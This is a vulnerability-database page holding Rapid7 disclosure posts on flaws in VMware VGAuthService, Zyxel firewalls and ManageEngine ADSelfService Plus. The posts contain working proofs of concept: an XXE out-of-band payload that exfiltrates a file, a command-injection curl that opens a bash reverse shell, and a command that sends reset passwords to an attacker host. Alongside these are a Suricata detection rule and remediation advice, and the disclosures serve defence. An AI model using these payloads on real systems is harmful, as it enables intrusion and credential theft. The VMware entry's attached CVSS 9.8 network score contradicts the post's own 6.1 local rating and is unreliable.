DATABASE RESOURCES PRICING ABOUT US

{"id": "RAPID7BLOG:906A9E6EA4F0C790B0063AB06B04CFE0", "vendorId": null, "type": "rapid7blog", "bulletinFamily": "info", "title": "CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)", "description": "\n\nA low-privileged local attacker can prevent the VMware Guest Authentication service (VGAuthService.exe) from running in a guest Windows environment and can crash this service, thus rendering the guest unstable. In some very contrived circumstances, the attacker can leak file content to which they do not have read access. We believe this would be scored as CVSSv3 AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H or 6.1 and is an instance of [CWE-73: External Control of File Name or Path](<https://cwe.mitre.org/data/definitions/73.html>).\n\n## Product description\n\nThe VMware Guest Authentication Service (VGAuthService.exe) is part of the VMware Tools suite of software used to provide integration services with other VMware services. It is commonly installed on Windows guest operating systems, though it appears that its only function is to [mystify users](<https://www.google.com/search?q=vmware+%22Guest+Authentication+Service%22>) when it fails.\n\n## Credit\n\nThis issue was discovered by Jake Baines of Rapid7. It is being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Exploitation\n\nThe versions of VMware host and guest operating systems are:\n\n * **Host platform: **MacOS Big Sur 11.6.1\n * **Host software: **VMware Fusion Professional 12.2.1 (18811640)\n * **Virtualized platform:** Windows 10.0.17763.1999 and Windows Server 2019\n * **Vulnerable software: **VGAuthService.exe (VMware Guest Authentication Service) \u201cFile version: 11.3.5.59284\u201d, \u201cProduct version 1.0.0. Build-18556986\u201d\n\nOnce running, the VMware Guest Authentication Service (VGAuthService.exe) is a service running with `NT AUTHORITY/SYSTEM` permissions and attempts to read files from the non-existent directory `C:\\Program%20Files\\VMware\\VMware%20Tools\\` during start-up.\n\n\n\nA low-privileged user can create this directory structure and cause VGAuthService.exe to read attacker controlled files. The files that the attacker controls are \u201ccatalog\u201d, \u201cxmldsig-core-schema.xsd\u201d, and \u201cxenc-schema.xsd\u201d. These files are used to define the XML structure used to communicate with VGAuthService.exe.\n\nHowever, actually modifying the structure of these files seems to have limited effects on VGAuthService.exe. Below, we describe a denial of service (which could take a number of forms) and a file content leak via XML External Entity.\n\n## Impact\n\nThe most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition, and there is a remote possibility of privileged file content exfiltration.\n\n### Denial of service\n\nA low-privileged user can prevent the service from starting by providing a malformed catalog file. For example, creating the file C:\\Program%20Files\\VMware\\VMware%20Tools\\etc\\catalog with the contents of:\n \n \n <?xml version=\"1.0\"?>\n <!DOCTYPE catalog PUBLIC \"-//OASIS//DTD Entity Resolution XML Catalog V1.0//EN\" \"http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd\">\n <catalog xmlns=\"urn:oasis:names:tc:entity:xmlns:xml:catalog\">\n <uri name=\"http://www.w3.org/TR/2002/REC-xmldsig-core-20020212/xmldsig-core-schema.xsd\" uri=\"xmldsig-core-schema.xsd\"/>\n <uri name=\"http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/xenc-schema.xsd\" uri=\"\\\\10.0.0.2\\fdsa\\xenc-schema.xsd\"/>\n </catalog>\n \n\nWill simply prevent the service from ever running due to the malformed uri field. The VGAuthService log file in `C:\\ProgramData\\VMware\\VMware VGAuth\\logfile.txt.0` will contain this line:\n \n \n [2022-02-01T14:03:50.100Z] [ warning] [VGAuthService] XML Error: uri entry 'uri' broken ?: \\\\10.0.0.2\\fdsa\\xenc-schema.xsd\n \n\nAfter the \u201cmalicious\u201d file is created, the system must be rebooted (or the service restarted). Until this happens, some remote tooling for the VMware guest will not function properly.\n\n### File content exfiltration via XML external entity (XXE) attacks, and the limitations thereof\n\nVGAuthService uses XML libraries (libxmlsec and libxml2) that have XML External Entity processing capabilities. Because the attacker controls various XML files parsed by the service, the attacker in theory can execute XXE injection and XXE out-of-band (OOB) attacks to leak files that a low-privileged user can\u2019t read (e.g. C:\\windows\\win.ini).\n\nIt is true that these styles of attacks do work against VGAuthService.exe, but there is a severe limitation. Traditionally, an XXE OOB attack leaks the file of the attackers choosing via an HTTP or FTP uri. For example, \u201c[http://attackurl:80/endpoint?FILEDATA\u201d](<http://attackurl:80/endpoint?FILEDATA%E2%80%9D>) where FILEDATA is the contents of the file. However, the XML library that VGAuthService.exe is using, libxml2, is very strict about properly formatted URI and any space character or newline will cause the exfiltration to fail. For example, let\u2019s say we wanted to perform an XXE OOB attack and leak the contents of C:\\Windows\\win.ini. I\u2019d create the following file at `C:\\Program%20Files\\VMware\\VMware%20Tools\\etc\\catalog`\n \n \n <?xml version=\"1.0\" ?>\n <!DOCTYPE r [\n <!ELEMENT r ANY >\n <!ENTITY % sp SYSTEM \"http://10.0.0.2/r7.dtd\">\n %sp;\n %param1;\n ]>\n <r>&exfil;</r>\n \n\nAnd then we\u2019d create the file `r7.dtd` on 10.0.0.2:\n \n \n <!ENTITY % data SYSTEM \"file:///c:/windows/win.ini\">\n <!ENTITY % param1 \"<!ENTITY exfil SYSTEM 'http://10.0.0.2/xxe?%data;'>\">\n \n\nAnd server the r7.dtd file via a python server on 10.0.0.2:\n \n \n albinolobster@ubuntu:~/oob$ sudo python3 -m http.server 80\n Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...\n \n\nOnce the attack is triggered, VGAuthService.exe will make quite a few HTTP requests to the attackers HTTP server:\n \n \n Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n 10.0.0.88 - - [01/Feb/2022 06:33:52] \"GET /r7.dtd HTTP/1.0\" 200 -\n \n\nBut notice that none of those HTTP requests contain the contents of win.ini. To see why, let\u2019s take a look at VGAuthService\u2019s log file.\n \n \n [2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: parser \n [2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: error : \n [2022-02-01T14:34:00.528Z] [ warning] [VGAuthService] XML Error: Invalid URI: http:///10.0.0.2/xxe?; for 16-bit app support\n [fonts]\n [extensions]\n [mci extensions]\n [files]\n [Mail]\n MAPI=1\n \n\nHere, we can see the contents of win.ini have been appended to `http://10.0.0.2/xxe?` and that has caused the XML library to error out due to an invalid URI. So we can\u2019t leak win.ini over the network, but we were able to write it to VGAuthService\u2019s log. Unfortunately (or fortunately, for defenders), the log file is only readable by administrative users, so leaking the contents of win.ini to the log file is no good for an attack.\n\nAn attacker _can_ leak a file as long as it can be used to form a valid URI. I can think of one very specific case where ManageEngine has a \u201cuser\u201d saved to file as \u201c0:verylongpassword\u201d where this could work. But that\u2019s super specific. Either way, we can recreate this like so:\n \n \n C:\\>echo|set /p=\"helloworld\" > r7.txt\n \n C:\\>type r7.txt\n helloworld\n C:\\>\n \n\nWe then do the same attack as above, but instead of `<!ENTITY % data SYSTEM \"file:///c:/windows/win.ini\">` we do `<!ENTITY % data SYSTEM \"file:///c:/r7.txt\">`\n\nAfter executing the attack, we\u2019ll see this on our HTTP server:\n \n \n 10.0.0.88 - - [01/Feb/2022 07:25:05] \"GET /xxe?helloworld HTTP/1.0\" 404 -\n \n\nWhile this is technically a low-privileged user leaking a file, it is quite contrived, and honestly an unlikely scenario.\n\nAnother common XXE attack is leaking NTLM hashes, but libxml2 doesn\u2019t honor UNC paths so that isn\u2019t a possibility. So, in conclusion, the low-privileged attacker can only deny access to the service and, very occasionally, leak privileged files.\n\n## Remediation\n\nVMware administrators who expect low-privileged, untrusted users to interact directly with the guest operating system should apply the patch at their convenience to avoid the denial-of-service condition. As stated above, the likelihood of anyone exploiting this vulnerability to exfiltrate secrets from the guest operating system is quite low, but if those circumstances apply to your environment, more urgency in patching is warranted.\n\nIn the absence of a patch, VMware administrators can create the missing directory with write permissions limited to administrators, and this should mitigate the issue entirely.\n\n## Disclosure timeline\n\n * **February, 2022: **Issue discovered by Jake Baines of Rapid7\n * **Thu, Feb 24, 2022:** Initial disclosure to [security@vmware.com](<mailto:security@vmware.com>)\n * **Thu, Feb 24, 2022:** Issue tracked as VSRC-10022.\n * **Wed, Mar 02, 2022: **Vendor asks for an extension beyond original April disclosure date\n * **Mon, May 23, 2022:** CVE-2022-22977 reserved by the vendor\n * **Tue, May 24, 2022: **This disclosure, as well as the [vendor's disclosure](<https://www.vmware.com/security/advisories/VMSA-2022-0015.html>) published\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>)_\n * _[2022 Cloud Misconfigurations Report: A Quick Look at the Latest Cloud Security Breaches and Attack Trends](<https://www.rapid7.com/blog/post/2022/04/20/2022-cloud-misconfigurations-report-a-quick-look-at-the-latest-cloud-security-breaches-and-attack-trends/>)_\n * _[CVE-2022-28810: ManageEngine ADSelfService Plus Authenticated Command Execution (Fixed)](<https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/>)_\n * _[CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)](<https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/>)_", "published": "2022-05-24T18:00:00", "modified": "2022-05-24T18:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.rapid7.com/2022/05/24/cve-2022-22977-vmware-guest-authentication-service-lpe-fixed/", "reporter": "Jake Baines", "references": [], "cvelist": ["CVE-2022-22977", "CVE-2022-24527", "CVE-2022-28810", "CVE-2022-30525"], "immutableFields": [], "lastseen": "2022-05-24T19:31:07", "viewCount": 17, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}}

{"rapid7blog": [{"lastseen": "2022-05-23T17:34:26", "description": "\n\nRapid7 discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the `nobody` user on the affected device.\n\nThe following table contains the affected models and firmware versions.\n\nAffected Model | Affected Firmware Version \n---|--- \nUSG FLEX 100, 100W, 200, 500, 700 | ZLD5.00 thru ZLD5.21 Patch 1 \nUSG20-VPN, USG20W-VPN | ZLD5.10 thru ZLD5.21 Patch 1 \nATP 100, 200, 500, 700, 800 | ZLD5.10 thru ZLD5.21 Patch 1 \n \nThe VPN series, which also supports ZTP, is not vulnerable because it does not support the required functionality.\n\n## Product description\n\nThe affected firewalls are [advertised](<https://www.zyxel.com/us/en/products_services/USG-FLEX-Firewall-USG-FLEX-700/features>) for both small branch and corporate headquarter deployments. They [offer](<https://www.zyxel.com/us/en/products_services/USG-FLEX-Firewall-USG-FLEX-700/license-and-spec>) VPN solutions, SSL inspection, web filtering, intrusion protection, and email security, and advertise up to 5 Gbps throughput through the firewall.\n\nThe affected models are relatively popular, with more than 15,000 visible on [Shodan](<https://www.shodan.io/search?query=title%3A%22USG+FLEX+100%22%2C%22USG+FLEX+100w%22%2C%22USG+FLEX+200%22%2C%22USG+FLEX+500%22%2C%22USG+FLEX+700%22%2C%22USG+FLEX+50%22%2C%22USG+FLEX+50w%22%2C%22ATP100%22%2C%22ATP200%22%2C%22ATP500%22%2C%22ATP700%22>).\n\n\n\n## CVE-2022-30525: Unauthenticated remote command injection\n\nThe affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the `nobody` user. This vulnerability is exploited through the `/ztp/cgi-bin/handler` URI and is the result of passing unsanitized attacker input into the `os.system` method in `lib_wan_settings.py`. The vulnerable functionality is invoked in association with the `setWanPortSt` command. An attacker can inject arbitrary commands into the `mtu` or the `data` parameter. Below is an example `curl` that will cause the firewall to execute `ping 192.168.1.220`:\n \n \n curl -v --insecure -X POST -H \"Content-Type: application/json\" -d\n '{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\"\n :\"1\",\"vlanid\":\"5\",\"mtu\":\"; ping 192.168.1.220;\",\"data\":\"hi\"}'\n https://192.168.1.1/ztp/cgi-bin/handler\n \n\nOn the firewall, the `ps` output looks like the following:\n \n \n nobody 11040 0.0 0.2 21040 5152 ? S Apr10 0:00 \\_ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL\n nobody 16052 56.4 0.6 18104 11224 ? S 06:16 0:02 | \\_ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py\n nobody 16055 0.0 0.0 3568 1492 ? S 06:16 0:00 | \\_ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 >/dev/null 2>&1\n nobody 16057 0.0 0.0 2152 564 ? S 06:16 0:00 | \\_ ping 192.168.1.220\n \n\nA reverse shell can be established using the normal bash [GTFOBin](<https://gtfobins.github.io/gtfobins/bash/#reverse-shell>). For example:\n \n \n curl -v --insecure -X POST -H \"Content-Type: application/json\" -d '\n {\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\n \"1\",\"vlanid\":\"5\",\"mtu\":\"; bash -c \\\"exec bash -i &>/dev/tcp/\n 192.168.1.220/1270 <&1;\\\";\",\"data\":\"hi\"}' https://192.168.1.1\n /ztp/cgi-bin/handler\n \n\nThe resulting reverse shell can be used like so:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 192.168.1.1 37882\n bash: cannot set terminal process group (11037): Inappropriate ioctl for device\n bash: no job control in this shell\n bash-5.1$ id\n id\n uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)\n bash-5.1$ uname -a\n uname -a\n Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux\n Bash-5.1\n \n\n## Metasploit module\n\nA [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16563>) has been developed for these vulnerabilities. The module can be used to establish a `nobody` Meterpreter session. The following video demonstrates exploitation:\n\n\n\nWe\u2019ve shared a PCAP that captures Metasploit\u2019s exploitation of a Zyxel USG FLEX 100. The PCAP can be found attached to the module\u2019s [pull request](<https://github.com/rapid7/metasploit-framework/pull/16563>). The Metasploit module injects commands in the `mtu` field, and as such, the following Suricata rule should flag its use:\n \n \n alert http any any -> any any ( \\\n msg:\"Possible Zyxel ZTP setWanPortSt mtu Exploit Attempt\"; \\\n flow:to_server; \\\n http.method; content:\"POST\"; \\\n http.uri; content:\"/ztp/cgi-bin/handler\"; \\\n http.request_body; content:\"setWanPortSt\"; \\\n http.request_body; content:\"mtu\"; \\\n http.request_body; pcre:\"/mtu[\"']\\s*:\\s*[\"']\\s*[^0-9]+/i\";\n classtype:misc-attack; \\\n sid:221270;)\n \n\n## Credit\n\nThis issue was discovered by [Jake Baines](<https://www.rapid7.com/blog/author/jake-baines/>) of Rapid7, and it is being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).\n\n## Remediation\n\nApply the vendor patch as soon as possible. If possible, enable automatic firmware updates. Disable WAN access to the administrative web interface of the system.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-30525 with a remote vulnerability check.\n\n## Disclosure timeline\n\nAstute readers will notice this timeline is a little atypical for Rapid7 disclosures. In accordance with our 60-day [disclosure policy](<https://www.rapid7.com/security/disclosure/>), we suggested a coordinated disclosure date in June. Instead, Zyxel released patches to address this issue on April 28, 2022. At that time, Zyxel did not publish an associated CVE or security advisory. On May 9, Rapid7 independently discovered Zyxel\u2019s uncoordinated disclosure. The vendor then reserved CVE-2022-30525.\n\nThis patch release is tantamount to releasing details of the vulnerabilities, since attackers and researchers can trivially reverse the patch to learn precise exploitation details, while defenders rarely bother to do this. Therefore, we're releasing this disclosure early in order to assist defenders in detecting exploitation and to help them decide when to apply this fix in their own environments, according to their own risk tolerances. In other words, silent vulnerability patching tends to only help active attackers, and leaves defenders in the dark about the true risk of newly discovered issues.\n\n**April 2022** \\- Discovered by Jake Baines \n**April 13, 2022** \\- Rapid7 discloses to [security@zyxel.com.tw](<mailto:security@zyxel.com.tw>). Proposed disclosure date June 21, 2022. \n**April 14, 2022** \\- Zyxel acknowledges receipt. \n**April 20, 2022** \\- Rapid7 asks for an update and shares delight over [\u201cHere is how to pronounce ZyXEL\u2019s name\u201d](<https://www.youtube.com/watch?v=I5nT-nRHvlU>). \n**April 21, 2022** \\- Zyxel acknowledges reproduction of the vulnerabilities. \n**April 28, 2022** \\- Zyxel releases patches without coordination with vulnerability reporter. \n**April 29, 2022** \\- Zyxel indicates patch is likely to release before June 14, 2022. \n**May 9, 2022** \\- Rapid7 realizes Zyxel already issued patches. Rapid7 asks Zyxel for a response on the silent patches and indicates that our team will publicly disclose the week of May 9, 2022. \n**May 10, 2022** \\- Zyxel reserves CVE-2022-30525 and proposes a new disclosure schedule. \n**May 12, 2022** \\- [Zyxel advisory](<https://www.zyxel.com/us/en/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml>), this disclosure bulletin, and Metasploit module published.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[CVE-2022-28810: ManageEngine ADSelfService Plus Authenticated Command Execution (Fixed)](<https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/>)_\n * _[CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)](<https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/>)_\n * _[CVE-2022-1026: Kyocera Net View Address Book Exposure](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)_\n * _[Analyzing the Attack Landscape: Rapid7\u2019s 2021 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2022/03/28/analyzing-the-attack-landscape-rapid7s-annual-vulnerability-intelligence-report/>)_[[[[ \n](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T13:30:29", "type": "rapid7blog", "title": "CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1026", "CVE-2022-24527", "CVE-2022-28810", "CVE-2022-30525"], "modified": "2022-05-12T13:30:29", "id": "RAPID7BLOG:02790CED26C6C155A03D093DB7BFF96F", "href": "https://blog.rapid7.com/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-26T21:31:02", "description": "\n\nOn April 9, 2022, ManageEngine fixed [CVE-2022-28810](<https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html>) with the release of ADSelfService Plus Build 6122. The vulnerability allowed the `admin` user to execute arbitrary operating system commands and potentially allowed partially authenticated Active Directory users to execute arbitrary operating system commands via the password reset functionality. Rapid7\u2019s Managed Detection and Response (MDR) team has observed this custom scripts feature in ADSelfService Plus being abused in the wild by remote attackers with valid administrative credentials.\n\n## Credit\n\nThis vulnerability was discovered by Rapid7 researchers Jake Baines, Hernan Diaz, Andrew Iwamaye, and Dan Kelly.\n\n## Exploitation\n\nThe vulnerability arose from a feature that allowed the `admin` user to execute arbitrary operating system commands after a password reset or account lockout status update.\n\n\n\nThe example provided by the UI is `cscript test.vbs %userName %password%` where `test.vbs` is supposed to be a file stored in `C:\\ManageEngine\\ADSelfService Plus\\bin` by a user with local access to the underlying operating system. But the reality is that any commands could be stored here. An attacker that acquired the `admin` user\u2019s password (default: admin) could trivially achieve remote command execution this way.\n\nFor example, the attacker could use the script command \u201ccmd.exe /c whoami,\u201d and when a user resets their password, the command \u201cwhoami\u201d is executed.\n\n\n\nRapid7 MDR has observed this technique being actively leveraged in customer environments \u2014 compromised (or default) `admin` credentials have been used to execute arbitrary OS commands in order to gain persistence on the underlying system and attempt to pivot further into the environment.\n\nFurthermore, the \u201c%password%\u201d variable was passed to the configured script without sanitization. Depending on the configured script, an attacker that is able to trigger a password reset could inject arbitrary operating system commands. For example, if the admin user configured the following script:\n \n \n cmd.exe /c echo %username% %password% >> C:\\ProgramData\\something.txt\n \n\nAn attacker could inject arbitrary commands via password reset by providing a %password% like:\n \n \n && mkdir C:\\ProgramData\\helloworld && echo hi\n \n\nResulting in the directory \u201chelloworld\u201d being created in `C:\\ProgramData\\`.\n\n\n\nFinally, because %password% isn\u2019t sanitized or obfuscated at all, the `admin` user can observe all password changes, allowing them to effectively recover valid credentials for active directory accounts. As a proof of concept for this, we used the `admin` account to configure the password reset script to exfiltrate the new password to a server in the attacker\u2019s control:\n \n \n cmd.exe /c curl http://10.0.0.2:1270/%userName%=%password%\n \n\nThe attacker server would receive the following on password reset:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.13 62065\n GET /albinolobster=sl0wrunner! HTTP/1.1\n Host: 10.0.0.2:1270\n User-Agent: curl/7.55.1\n Accept: */*\n \n\n## The patch\n\nManageEngine fixed this issue by no longer accepting scripts through the web interface. Post action scripts must now be placed on disk by a user with access to the underlying operating system. Furthermore, the script arguments are now base64 encoded. Here is an updated version of the Post Action interface.\n\n\n\n## Indicators of compromise\n\nWe encourage users of ManageEngine ADSelfService Plus to inspect the value they have configured in the Post Action fields. Using the `admin` account, you can navigate to the fields by following this pattern: `Configuration -> Self Service -> Policy Configuration -> Advanced -> Password Sync`.\n\nWe also highly encourage users to upgrade as soon as possible and to change the `admin` password.\n\n## Disclosure timeline\n\n**Tue, Apr 6, 2022:** Initially discovered in the wild via Rapid7 Managed Detection and Response (MDR) service \n**Tue April 6, 2022:** Initial disclosure to the vendor via their [reporting portal](<https://bugbounty.zoho.com/bb/info>) \n**Wed April 7, 2022:** Discussion with vendor about the issues, CVE assignment, and disclosure timelines \n**Sat April 9, 2022:** ManageEngine [publishes](<https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html>) a new version of ADSelfService Plus \n**Tue Apr 12, 2022:** Disclosed to CERT/CC and NCSC \n**April 14, 2022:** Rapid7 publishes their disclosure (this document)\n\n## Rapid7 customers\n\n[InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) customers can assess their exposure to CVE-2022-28810 with an unauthenticated vulnerability check in the April 13, 2022 content release.\n\n[InsightIDR\u2019s](<https://www.rapid7.com/products/insightidr/>) existing detection rules (listed below) are able to identify attacks that abuse this functionality. We recommend that you review your settings for these detection rules and confirm they are turned on and set to an appropriate rule action and priority for your organization:\n\n * Suspicious Process - Powershell Invoke-WebRequest\n * Attacker Technique - Attrib Sets File Or Directory As Hidden And System\n * Attacker Technique - Enumerating Domain Or Enterprise Admins With Net Command\n * Suspicious Process - Zoho ManageEngine Spawns Child\n\nWe have also added the following detection rule and prioritized it as Critical:\n\n * Attacker Technique - Hiding ScreenConnect With Attrib\n\nRapid7 detection logic is continuously reviewed to ensure detections are based on any observed attacker behavior seen by our Incident Response (IR), [Managed Detection and Response (MDR)](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>), and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors and will make updates as necessary.\n\n_**Additional reading:**_\n\n * _[CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)](<https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/>)_\n * _[CVE-2022-1026: Kyocera Net View Address Book Exposure](<https://www.rapid7.com/blog/post/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/>)_\n * _[Analyzing the Attack Landscape: Rapid7\u2019s 2021 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2022/03/28/analyzing-the-attack-landscape-rapid7s-annual-vulnerability-intelligence-report/>)_\n * _[CVE-2021-4191: GitLab GraphQL API User Enumeration (FIXED)](<https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2022-04-14T15:48:37", "type": "rapid7blog", "title": "CVE-2022-28810: ManageEngine ADSelfService Plus Authenticated Command Execution (Fixed)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, 